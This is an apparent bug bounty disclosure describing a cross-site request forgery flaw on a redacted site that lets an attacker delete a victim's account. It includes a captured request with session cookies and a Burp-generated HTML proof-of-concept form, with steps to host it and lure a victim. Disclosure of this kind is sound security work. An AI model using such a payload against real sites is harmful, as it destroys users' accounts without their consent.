CSRF to delete accounts [HtUS]

Hello, I Have an endpoint in ██████████that's vulerable to CSRF which lead to delete a victim's account Steps to reproduce: 1. Nevgaite to ███Create an account 2. Click on your profile 3. You will see DELETE ACCOUNT button 4. Click on it and type YES in the input 5. Make sure your burpsuite is on and click delete account button ``` POST /users/deleteAccount HTTP/1.1 Host: ██████ Cookie: _ga=GA1.2.984523169.1657131465; _gid=GA1.2.2029769492.1657131465; session=eyJwYXNzcG9ydCI6eyJ1c2VyIjoibmlnaHRtNHJlQHdlYXJlaGFja2Vyb25lLmNvbSJ9fQ==; session.sig=S8rkHNPfoRIIU66VUCbDCaV_Kb4; _ga_FCSTM1E00P=GS1.1.1657145372.2.1.1657145650.0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Origin: https://███████ Referer: https://█████/users/deleteAccount Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Content-Length: 0 Te: trailers Connection: close ``` 6. Capture the request and click right > Engagement Tools > Generate CSRF POC ``` <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="https://████/users/deleteAccount" method="POST"> <input type="submit" value="Submit request" /> </form> </body> </html> ``` 7. Copy the HTML Code and put to your server and send the page to the victim 8. Once the vicitm opnening the page his account will be deleted ## Impact An attacker can delete vicitm's account